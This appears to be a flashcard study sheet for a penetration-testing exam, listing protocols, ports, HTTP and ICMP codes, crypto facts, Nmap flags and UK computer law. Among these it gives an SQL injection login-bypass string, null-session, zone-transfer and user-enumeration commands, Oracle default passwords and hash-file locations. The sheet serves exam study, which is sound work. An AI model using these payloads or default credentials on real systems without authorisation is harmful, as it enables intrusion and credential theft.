WSUS
Windows Server Update Services

SSH
Secure Shell

WSDL
Web Services Description Language

CNAME
Canonical Name

TTL
Time to Live

CGI
Common Gateway Interface

STP
Spanning Tree Protocol

In a DNS zone transfer, what is a requested?
Requests all data on a domain.

Telnet remote machine returns :

User Access Verification
Password.

Which o/s?
Cisco ios

DES
Data Encryption Standard

DES. Key size?
56 bits

HTTP OSI Model layer?
Layer 7: Application

HTTP Code. Temporarily moved?
302

SQL server resolution service introduced?
SQL server 2000

SQL server stored procedures.
xp_cmdshell

ICMP type 8 response to host without firewall
Echo

SYS user password (oracle)
CHANGE_ON_INSTALL

how can HTTP Trace method used against web server?
user cookie and session information compromised

Java technique that minimises threat from applets
Sandbox

enumerate users with empty GECOS field.
finger 0@

LANMAN and NTLM.
Don’t use a salt.

Stored procedure xp_cmdshell can?
Execute any DOS commands.

Unmap unused ISAPI filters to…?
…..reduce attack surface against IIS

Which SQL string can be used in username to bypass an authentication mechanism.
‘ or 1=1 – –

Different Web site host names have same IP. How does web server differentiate?
Inspecting host field in client request.

HTTP Method for enumerating HTTP methods.
OPTIONS

EXPN command protocol?
SMTP

DNS Zone transfer command.
dig @relay.example.org example.org axfr

SMTP commands to enumerate users on a default Sendmail server.
VRFY EXPN RCPT TO

CVE-2003-0780 MySQL version has post authentication privilege escalation issue.
MySQL 4.0.15

DES Data block size
64 bits

RC4 Key size
128

Symmetric encryption algorithm.
AES

Salted md5?
Salted md5?

Trusted hosts and usernames for unix r-services
/etc/hosts.equiv

Cookie attribute for must stored on disk
Expires

Null session to windows.
net use \host\ipc$”” /u:””

Reason for written permission for pen test.
Misuse of computer act.

CVE-2002-0906 buffer overflow, sendmail version.
8.12.4

Which ruser command lists active user details.
rusers -l

Password hashes stored on linux
/etc/shadow

HTTP Methods
Options, delete,put,trace,

SAM file location
%systemroot%\system32\config\SAM

IIS 5.0. Which o/s?
Windows 2000

IPv6 bits?
128

How are cookies presented back to the server?
Cookie HTTP header.

SOAP
Simple Object Access Protocol

HTTP method for soap api data transfer?
POST

Windows permissions

Windows tracert packets?
ICMP

Which command enumerates exchange server connected by Telnet.
EHLO

SSH version susceptible to man in the middle attacks.
Version 1

TTL = 128. Which o/s?
Windows

Public Key Encryption
RSA

ICMP destination host unreachable (number?)
3

Windows command to list all patches
wmic qfe

TNS listener default config.
Before Oracle 10g it could be remotely managed.

LDAP command injection characters.
()&*|

RSA
Rivest, Shamir, & Adleman

Self signed SSL. Certificate vulnerability
Spoof certificate and execute man in the middle attack

Cookie can be accessed by client side scripts. Which cookie attribute?
httponly

CVE-2001-0414 NTP remote exploit version?
4.0.99k

AD database filename
NTDS.DIT

IPv4 bits?
32 bits

Prevent user enumeration through null sessions. Which registry?
Restrict Anonymous.

IKE Main mode more secure than aggressive. Because?
identity protection.

DNS Zone Reverse look up record. For ip 192.168.1.10
10.1.168.192. In-addr.arpa. IN PTR alpha.example.com

BIND version information. Command?
dig @beta.example.com version.bind chaos txt

xhost –
Host based authentication disabled.

NOT a SIP method.
Quit.

FTP command to initiate data transfer
PORT

MAC address size.
48 Bits

802.3
Ethernet

DBSNMP default password?
DBSNMP

CVE 2012-5615 MySQL 5.6.0 vulnerability.?
Username enumeration.

NOT an ICMP message
Bad Length

PHP version chunk_split()function overflow

HTTP status code bad request?
400

TFTP command to list directory.
You cannot list directory.

ARP
Address Resolution Protocol

VTP
VLAN Trunking Protocol

CDP
Cisco Discovery Protocol

TACACS
Terminal Access Controller Access Control System

100
Continue

101
Switching Protocols

102
Processing

Internet Protocol Security (IPsec)
a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet Protocol network

Internet Protocol Security (IPsec)
used in virtual private networks (VPNs)

number of possible TCP ports
65535

number of possible UDP ports
65535

RFC1918 24-bit block
10.0.0.0/8

RFC1918 20-bit block
172.16.0.0/12

RFC1918 16-bit block
192.168.0.0/16

Common Vulnerabilities and Exposures (CVE)
provides a reference-method for publicly known information-security vulnerabilities and exposures

Common Vulnerability Scoring System (CVSS)
an open industry standard for assessing the severity of computer system security vulnerabilities

DREAD
part of a system for risk-assessing computer security threats

Common Weakness Enumeration (CWE)
a category system for software weaknesses and vulnerabilities

National Vulnerability Database (NVD)
the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP)

500
Internal Server Error

501
Not Implemented

502
Bad Gateway

503
Service Unavailable

504
Gateway Timeout

505
HTTP Version Not Supported

511
Network Authentication Required

CHANGE_ON_INSTALL
SYS

MANAGER
SYSTEM

TIGER
SCOTT

WOOD
ADAMS

STEEL
JONES

CLOTH
CLARK

PAPER
BLAKE

TRACE
TRACESVR

MANAGER
OLAPSYS

CHANGE_ON_INSTALL
XDB

400
Bad Request

401
Unauthorized

402
Payment Required

403
Forbidden

404
Not Found

405
Method Not Allowed

406
Not Acceptable

407
Proxy Authentication Required

408
Request Timeout

409
Conflict

410
Gone

411
Length Required

413
Payload Too Large

426
Upgrade Required

429
Too Many Requests

threat
a source of potential disruption, which has the potential to cause a risk

risk
the combination of consequences of a threat occurring and the likelihood of it doing so

inherent risk
the risk that an event will occur which may negatively affect the achievement of organisation’s objectives, assuming there are no controls in place

residual risk
the risk which remains after taking controls in to account

Session Initiation Protocol (SIP)
a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications

SIP requests
REGISTER; INVITE; ACK; BYE; CANCEL; UPDATE; REFER; PRACK; SUBSCRIBE; NOTIFY; PUBLISH; MESSAGE; INFO; OPTIONS

IPsec security architecture
Authentication Headers (AH)
Encapsulating Security Payloads (ESP)
Security Associations (SA) – Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE and IKEv2)

LM
all passwords are converted into uppercase before generating the hash value

LM
password length is limited to maximum of 14 characters

LM
a 14-character password is broken into 7+7 characters and the hash is calculated for the two halves separately

LM
if the password is 7 characters or less, then the second half of hash will always produce same constant value (AAD3B435B51404EE)

LM
the hash value is sent to network servers without salting

LM
uses DES

128 bits
LAN Manager (LM) hash size:

Net-NTLM
used for network authentication

Net-NTLM
get these hashes when using tools like Responder or Inveigh

Net-NTLMv1
uses DES

Net-NTLMv2
uses HMAC-MD5

128 bits
Network New Technology LAN Manager (Net-NTLM) hashes size:

NTLM
get these hashes when dumping the SAM database of any Windows OS, a Domain Controller’s Ntds.dit database or from Mimikatz

NTLM
uses MD4

128 bits
New Technology LAN Manager (NTLM) hash size:

NTLM
You CAN perform Pass-The-Hash attacks with these hashes

Net-NTLM
You CANNOT perform Pass-The-Hash attacks with these hashes

nbtstat; nbtscan
NetBIOS scanning tools:

nbtstat
a command line utility that is integrated in windows systems and it can unveil information about the NetBIOS names and the remote machine name table or local but only for one host

nbtscan
a NetBIOS nameserver scanner which has the same functions as nbtstat but it operates on a range of addresses instead of one

PEAP
a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel

LEAP
a proprietary wireless LAN authentication method developed by Cisco Systems

LEAP
uses WEP

stream cipher (symmetric)
Rivest Cipher 4 (RC4)

symmetric-key block cipher
Rivest Cipher 5 (RC5)

symmetric-key block cipher
Data Encryption Standard (DES)

symmetric-key block cipher
Advanced Encryption Standard (AES)

Media Access Control (MAC) address
of a device is a unique identifier assigned to a network interface controller (NIC)

48 bits
Media Access Control (MAC) address size:

Oracle System ID (SID)
used to uniquely identify a particular database on a system

rlogin; rcp; rsh
Berkeley r-commands that share the hosts.equiv and .rhosts access-control scheme

permissions required for copying a file into / out of a directory
source directory: execute and read permission
source file: read permission
target directory: execute and write permission
target file: you don’t need any permission since it doesn’t exit before you copy it. or write permission if the file exists

blind SQL injection
a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response – this attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection

Link-Local Multicast Name Resolution (LLMNR)
a Microsoft Windows protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link

Network Basic Input/Output System (NetBIOS) name service
identifies systems on a local network by their NetBIOS name

LLMNR spoofing
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system.

FTP bounce attack
an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine as a middle man for the request

Ntds.dit file
a database that stores Active Directory data, including information about user objects, groups, and group membership – it includes the password hashes for all users in the domain

computer worm
What is Code Red?

Internet Information Services (IIS) 5.0
MS01-033 basis

Code Red
The MS01-033 vulnerability was used by which malware?

computer worm
What is Conficker?

Conficker
The MS08-067 vulnerability was used by which malware?

computer worm
What is Blaster?

Distributed Component Object Model (DCOM)
MS03-026 basis

Blaster
The MS03-026 vulnerability was used by which malware?

computer worm
What is Nimda?

Local Security Authority Subsystem Service (LSASS)
MS04-011 basis

Internet Explorer
MS10-002 basis

Aurora
MS10-002 name

KiTrap0D
MS10-015 name

Print Spooler Service
MS10-061 basis

OK
200

Created
201

Accepted
202

Non-Authoritative Information
203

No Content
204

Reset Content
205

300
Multiple Choices

301
Moved Permanently

302
Found

307
Temporary Redirect

308
Permanent Redirect

0
Echo Reply

3
Destination Unreachable

4
Source Quench

5
Redirect Message

8
Echo Request

9
Router Advertisement

10
Router Solicitation

11
Time Exceeded

30
Traceroute

42
Extended Echo Request

43
Extended Echo Reply

Address Resolution Protocol (ARP)
a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given Internet layer address, typically an IPv4 address

Dynamic Host Configuration Protocol (DHCP)
a network management protocol used on UDP/IP networks whereby a DHCP server dynamically assigns an IP address and other network configuration parameters to each device on a network so they can communicate with other IP networks

Hot Standby Router Protocol (HSRP)
a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway

Virtual Router Redundancy Protocol (VRRP)
a computer networking protocol that provides for automatic assignment of available Internet Protocol (IP) routers to participating hosts

VLAN Trunking Protocol (VTP)
a Cisco proprietary protocol that propagates the definition of Virtual Local Area Networks (VLAN) on the whole local area network

Spanning Tree Protocol (STP)
a network protocol that builds a loop-free logical topology for Ethernet networks

Terminal Access Controller Access-Control System Plus (TACACS+)
a protocol developed by Cisco that handles authentication, authorisation, and accounting (AAA) services

Voice over Internet Protocol (VoIP)
a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet

Session Initiation Protocol (SIP)
a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications

IEEE 802.11
part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2, 4, 5, and 60 GHz frequency bands

Kismet
passive scanner on Linux

Wired Equivalent Privacy (WEP)
both XXX-40 and XXX-104 were deprecated in 2004

Temporal Key Integrity Protocol (TKIP)
deprecated in 2012

Wi-Fi Protected Access / Wi-Fi Protected Access II (WPA/WPA2)
defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)

Extensible Authentication Protocol (EAP)
an authentication framework frequently used in wireless networks and point-to-point connections

Lightweight Extensible Authentication Protocol (LEAP)
a proprietary wireless LAN authentication method developed by Cisco

Protected Extensible Authentication Protocol (PEAP)
a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel

Teletype Network (Telnet)
a protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection

Teletype Network (Telnet)
does not encrypt any traffic sent over the connection by default

Hypertext Transfer Protocol (HTTP)
an application protocol for distributed, collaborative, hypermedia information systems

Hypertext Transfer Protocol (HTTP)
does not encrypt any traffic sent over the connection

Hypertext Transfer Protocol Secure (HTTPS)
used for secure communication over a computer network, and widely used on the Internet

File Transfer Protocol (FTP)
a standard network protocol used for the transfer of computer files between a client and server on a computer network

File Transfer Protocol (FTP)
does not encrypt any traffic sent over the connection

Secure Shell (SSH)
a cryptographic network protocol for operating network services securely over an unsecured network

Simple Network Management Protocol (SNMP)
an Internet Standard protocol for collecting and organising information about managed devices on IP networks and for modifying that information to change device behaviour

using SNMP to attack a network
the SNMP implementation of Cisco 11.0 and 12.0 is vulnerable to certain denial of service attacks

SNMP authentication
SNMP v1 sends passwords in clear-text over the network

SNMP autodiscovery
in SNMP v1 and v2c the community string is broadcast in clear-text to other devices

Trivial File Transfer Protocol (TFTP)
a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host

Trivial File Transfer Protocol (TFTP)
includes no login or access control mechanisms

Cisco Reverse Telnet
allows you to telnet to a device then from that device connect to the console of another device

Network Time Protocol (NTP)
a networking protocol for clock synchronisation between computer systems over packet-switched, variable-latency data networks

NTP message spoofing
used to move clocks on client computers

Network Time Protocol (NTP)
used in distributed denial of service (DDoS) attacks

SNMP, RMON [Cisco5506], Netflow [Cisco06]
router based techniques for local network traffic analysis

[Active06], [Curtis00]
non-router based techniques for local network traffic analysis

.pcap files
data files created using Wireshark and they contain the packet data of a network

network socket
an internal endpoint for sending or receiving data within a node on a computer network

netstat, ss
command line tools are used to list established sockets and related information

C:\windows\system32\config\SAM
password hashes (Windows):

/etc/shadow
password hashes (Unix):

domain information, registrant contact, administrative contact, technical contact
information contained within IP and domain registries (WHOIS)

DNS zone transfer
one of many mechanisms available for administrators to replicate DNS databases across a set of DNS servers

zone
the portion of the database that is replicated

Start Of [a zone of] Authority (SOA)
specifies authoritative information about a DNS zone

Mail eXchange (MX)
domain to mail server

Text (TXT)
more often carries machine-readable data, opportunistic encryption, etc.

Address (A)
domain to IP

Name Server (NS)
domain to a set of name servers

Pointer (PTR)
IP to a domain

HINFO
intended to provide information about host CPU type and operating system

Canonical Name (CNAME)
subdomain to a domain’s A record

Usenet newsgroup
a repository usually within the Usenet system, for messages posted from many users in different locations using Internet

-rwxr-xr-x
a regular file whose user class has full permissions and whose group and others classes have only the read and execute permissions

0740
-rwxr—–

archive, hidden, system, read-only
traditionally, in Microsoft Windows, files and folders accepted four attributes:

filesystem Access Control List (ACL)
a data structure (usually a table) containing entries that specify individual user or group rights to specific system objects such as programmes, processes, or files

encryption
transforms data into another format in such a way that only specific individual(s) can reverse the transformation

encoding
transforms data into another format using a scheme that is publicly available so that it can easily be reversed

symmetric encryption
uses the same cryptographic keys for both encryption of plaintext and decryption of ciphertext

asymmetric encryption
uses pairs of keys: public keys which may be disseminated widely, and private keys which are known only to the owner

symmetric-key block cipher
DES – Data Encryption Standard

64 bits
DES block sizes:

56 bits
DES key sizes:

symmetric-key block cipher
3DES – Triple Data Encryption Standard

64 bits
3DES block sizes:

168, 112, or 56 bits
3DES key sizes:

symmetric-key block cipher
AES – Advanced Encryption Standard

128 bits
AES block sizes:

128, 192, or 256 bits
AES key sizes:

public-key cryptosystem
RSA – Rivest-Shamir-Adleman

1024 – 4096 bits
RSA key sizes:

Secure Hash Algorithm 1 (SHA1)
cryptographic hash function which takes an input and produces a 160-bit hash value known as a message digest – typically rendered as a hexadecimal number, 40 digits long

512 bits
SHA1 block sizes:

Message-Digest algorithm (MD5)
hash function producing a 128-bit hash value

512 bits
MD5 block sizes:

message integrity codes
a short piece of information used to authenticate a message – in other words, to confirm that the message came from the stated sender (its authenticity) and has not been changed

Hash-based Message Authentication Code (HMAC)
a specific type of Message Authentication Code (MAC) involving a cryptographic hash function and a secret cryptographic key

firewall
a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules

firewall
often categorised as either network firewalls or host-based firewalls

network access control list
a network filter utilised by routers and some switches to permit and restrict data flows into and out of network interfaces

router
a networking device that forwards data packets between computer networks

switch
a computer networking device that connects devices on a computer network by using packet switching to receive, process, and forward data to the destination device

Secure Sockets Layer (SSL)
a set of cryptographic protocols designed to provide communications security over a computer network

Internet Protocol Security (IPsec)
a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet protocol network which is used in Virtual Private Networks (VPNs)

Secure Shell (SSH)
a cryptographic network protocol for operating network services securely over an unsecured network

Secure Shell (SSH)
typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH

Pretty Good Privacy (PGP)
an encryption programme that provides cryptographic privacy and authentication for data communication

Pretty Good Privacy (PGP)
used or signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications

Wired Equivalent Privacy (WEP)
standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialisation vector (IV) to form the RC4 key

Temporal Key Integrity Protocol (TKIP)
designed as an interim solution to replace WEP without requiring the replacement of legacy hardware

Wi-Fi Protected Access (WPA)
defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)

egress filtering
the practice of monitoring and potentially restricting the flow of information outbound from one network to another

egress filtering
TCP/IP packets that are being sent out of the internal network are examined via a router, firewall, or similar edge device

ingress filtering
a technique used to ensure that incoming packets are actually from the networks from which they claim to originate

banner grabbing
a technique used to gain information about a computer system on a network and the services running on its open ports

examples of ports used for banner grabbing
Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively

active fingerprinting
works by sending packets to a target and analysing the packets that are sent back

Nmap
almost all active fingerprinting is done with:

passive fingerprinting
sniffs TCP/IP ports, rather than generating network traffic by sending packets to them

application layer
7

presentation layer
6

session layer
5

transport layer
4

network layer
3

data link layer
2

physical layer
1

port scanner
an application to probe a server or host for open ports

Nmap
used to discover hosts and services on a computer network by sending packets and analysing the responses

-sS
TCP SYN (Stealth) Scan

-sT
TCP Connect Scan

-sU
UDP Scan

-sO
IP Protocol Scan

-p
selecting ports

-T0 through -T5
these timing templates affect many variables to adjust overall Nmap speed from very slow (-T0) to extremely aggressive (T5)

–max-rtt-timeout
the maximum amount of time to wait for a port scan probe response

–max-retries
the maximum number of port scan probe retransmissions to a single port

–scan-delay
wait at least the given amount of time between sending probes to any individual host

-v
increase the verbosity level

-vv
further increase the verbosity level

-oA
output to all formats (.nmap, .xml, .gnmap)

-6
scan the target using the IPv6 protocol

network sniffer
computer programme or piece of computer hardware that can intercept and log traffic that passes over a digital network or part of a network

ping
measures the round-trip time for messages sent from the originating host to a destination computer that are echoed back to the source

ping
operates by sending Internet Control Message Protocol (ICMP) echo request packets to the target host and waiting for an ICMP echo reply

-s
specifies the number of data bytes to be sent

-c
stop after sending count ECHO_REQUEST packets

-w
specify a timeout, in seconds, before ping exits regardless of how many packets have been sent or received

-t
set the IP Time To Live (TTL)

-i
wait interval seconds between sending each packet

-R
record route

ping sweep
a method that can establish a range of IP addresses which map to live hosts

fping
a tool used for ping sweeps

Internet Protocol version 4 (IPv4)
uses 32-bit addresses (represented as 4 groups of 4 decimal numbers with the groups being separated by full stop)

Internet Protocol version 6 (IPv6)
uses 128-bit addresses (represented as 8 groups of 4 hexadecimal digits with the groups being separated by colons)

Transmission Control Protocol (TCP)
provides reliable, ordered, and error-checked delivery of a stream of octets between applications running on hosts communicating via an IP network

User Datagram Protocol (UDP)
has no handshaking dialogues, and thus exposes the user’s programme to any unreliability of the underlying network; there is no guarantee of delivery, ordering, or duplicate protection

Internet Control Message Protocol (ICMP)
used by network devices, including routers, to send error messages and operational information

8 bits
1 byte

8 bits
1 octet

Category 5 cable (CAT 5)
a twisted pair cable for computer networks

Category 5 cable (CAT 5)
suitable for most varieties of Ethernet over twisted pair

fibre-optic communication
a method of transmitting information from one place to another by sending pulses of light through an optical fibre

10/100/1000baseT
standards of twisted-pair cables for the physical layer of an Ethernet computer network

Token Ring
a communications protocol for local area networks

Token Ring
uses a special three-byte frame called a ‘token’ that travels around a logical ‘ring’ of workstations or servers

wireless (802.11)
part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2.4, 5, and 60 GHz frequency bands

shared media
nodes share a single communication medium (e.g. Ethernet); every message reaches every node

switched media
communication is point-to-point through dedicated lines

Virtual LAN (VLANs)
any broadcast domain that is partitioned and isolated in a computer network at the data link layer

Computer Misuse Act
CMA

Domain Name System
DNS

Electronic Code Book
ECB

Flexible Single Master Operations
FSMO

Hypertext Markup Language
HTML

Hypertext Transfer Protocol
HTTP

Inter Asterisk eXchange
IAX

Internet Server Application Programming Interface
ISAPI

Network File System
NFS

Protected Extensible Authentication Protocol
PEAP

Public Key Infrastructure
PKI

Remote Authentication Dial In User Service
RADIUS

Rivest Shamir Adleman
RSA

Supervisory Control And Data Acquisition
SCADA

Session Initiation Protocol
SIP

Start Of Authority
SOA

Simple Object Access Protocol
SOAP

Structured Query Language
SQL

Secure Shell
SSH

Spanning Tree Protocol
STP

Temporal Key Integrity Protocol
TKIP

Universal Description Discovery and Integration
UDDI

User Datagram Protocol
UDP

Wired Equivalent Privacy
WEP

Wi-fi Protected Access
WPA

Web Services Description Language
WSDL

application pen testing
finds technical vulnerabilities

infrastructure pen testing
examines servers, firewalls and other hardware for security vulnerabilities

black box
no information is provided to the penetration tester

white box
full information is provided, for example network maps and access to development staff

Computer Misuse Act 1990
originally nothing to make DOS attacks illegal

Computer Misuse Act 1990
modifications in Police and Justice Act 2006 changed Section 3

Computer Misuse Act 1990
made DDOS via botnets illegal

Human Rights Act 1998
Article 8 – right to respect for private and family life, home and correspondence

Data Protection Act 1998
Section 55 – unlawful obtaining etc. of personal data

Police and Justice Act 2006
made amendments to the Computer Misuse Act 1990

Police and Justice Act 2006
made it illegal to perform DOS attacks

Police and Justice Act 2006
made it illegal to supply and own hacking tools

Police and Justice Act 2006
increased penalties of Computer Misuse Act 1990

risk of pen testing
degradation or loss of services

risk of pen testing
disclosure of sensitive information

TCP 548
Apple Filing Protocol (AFP) over TCP

TCP 179
Border Gateway Protocol (BGP)

UDP 67
Bootstrap Protocol (BOOTP) server; Dynamic Host Configuration Protocol (DHCP)

UDP 68
Bootstrap Protocol (BOOTP) client; Dynamic Host Configuration Protocol (DHCP)

TCP&UDP 19
Character Generator Protocol (CHARGEN)

TCP&UDP 13
Daytime Protocol

TCP&UDP 135
Distributed Computing Environment (DCE) endpoint resolution; Microsoft End Point Mapper (EPMAP); Distributed Component Object Model (DCOM)

TCP&UDP 546
Dynamic Host Configuration Protocol version 6 (DHCPv6) client

TCP&UDP 547
Dynamic Host Configuration Protocol version 6 (DHCPv6) server

TCP&UDP 9
Discard Protocol

TCP&UDP 53
Domain Name System (DNS)

TCP&UDP 7
Echo Protocol

TCP 79
Finger Protocol

TCP 21
File Transfer Protocol (FTP) control

TCP 20
File Transfer Protocol (FTP) data transfer

TCP&UDP 989
File Transfer Protocol over TLS/SSL (FTPS) data transfer

TCP&UDP 990
File Transfer Protocol over TLS/SSL (FTPS) control

TCP 70
Gopher Protocol

TCP 80
Hypertext Transfer Protocol (HTTP)

TCP 443
Hypertext Transfer Protocol over TLS/SSL (HTTPS)

TCP 113
Identification (ident) Protocol; Authentication Service

TCP 143
Internet Message Access Protocol (IMAP)

TCP&UDP 631
Internet Printing Protocol (IPP)

TCP&UDP 194
Internet Relay Chat (IRC)

TCP 6665-6669
Internet Relay Chat (IRC) (common alternatives)

UDP 500
Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE)

TCP 860
Internet Small Computer Systems Interface (iSCSI)

TCP 389
Lightweight Directory Access Protocol (LDAP)

TCP 636
Lightweight Directory Access Protocol over TLS/SSL (LDAPS)

TCP 515
Line Printer Daemon (LPD) protocol

UDP 138
Network Basic Input/Output System (NetBIOS) Datagram Service

TCP 139
Network Basic Input/Output System (NetBIOS) Session Service

TCP&UDP 137
Network Basic Input/Output System (NetBIOS) Name Service

TCP 119
Network News Transfer Protocol (NNTP)

TCP&UDP 563
Network News Transfer Protocol over TLS/SSL (NNTPS)

UDP 123
Network Time Protocol (NTP)

TCP 110
Post Office Protocol version 3 (POP3)

TCP&UDP 995
Post Office Protocol version 3 over TLS/SSL (POP3S)

TCP&UDP 17
Quote of the Day (QOTD)

TCP&UDP 554
Real Time Streaming Protocol (RTSP)

UDP 520
Routing Information Protocol (RIP)

TCP 513
rlogin

UDP 513
rwho; ruptime

TCP&UDP 445
Microsoft Directory Services (DS) Active Directory (AD)

TCP 445
Microsoft Directory Services (DS) Server Message Block (SMB)

TCP 25
Simple Mail Transfer Protocol (SMTP)

TCP 465
URL rendezvous directory for SSM; authenticated Simple Mail Transfer Protocol over TLS/SSL (SMTPS)

TCP 22
Secure Shell (SSH)

TCP&UDP 111
Open Network Computing Remote Procedure Call (ONC RPC)

TCP 514
Remote Shell (RSH); rcp

TCP&UDP 49
Terminal Access Controller Access-Control System (TACACS) login host protocol; TACACS+

TCP 23
Telnet protocol

UDP 69
Trivial File Transfer Protocol (TFTP)

TCP 43
WHOIS protocol

TCP 1521
Oracle database default listener

TCP&UDP 1433
Microsoft SQL Server (MSSQL) database management system server

TCP&UDP 1434
Microsoft SQL Server (MSSQL) database management system monitor

TCP&UDP 177
X Display Manager Control Protocol (XDMCP)

TCP 3306
MySQL

TCP&UDP 33434
traceroute

TCP 3128
Squid

TCP&UDP 1194
OpenVPN

TCP&UDP 1524
ingres

TCP 50000
IBM Db2

TCP 5432
PostgreSQL database system

TCP 512
Rexec

Structured Query Language
SQL

Wired Equivalent Privacy
WEP

Data Encryption Standard
DES

Trivial File Transfer Protocol
TFTP

Local Security Authority
LSA

Security Accounts Manager
SAM

Pretty Good Privacy
PGP

Related Posts

Leave a Comment

Scroll to Top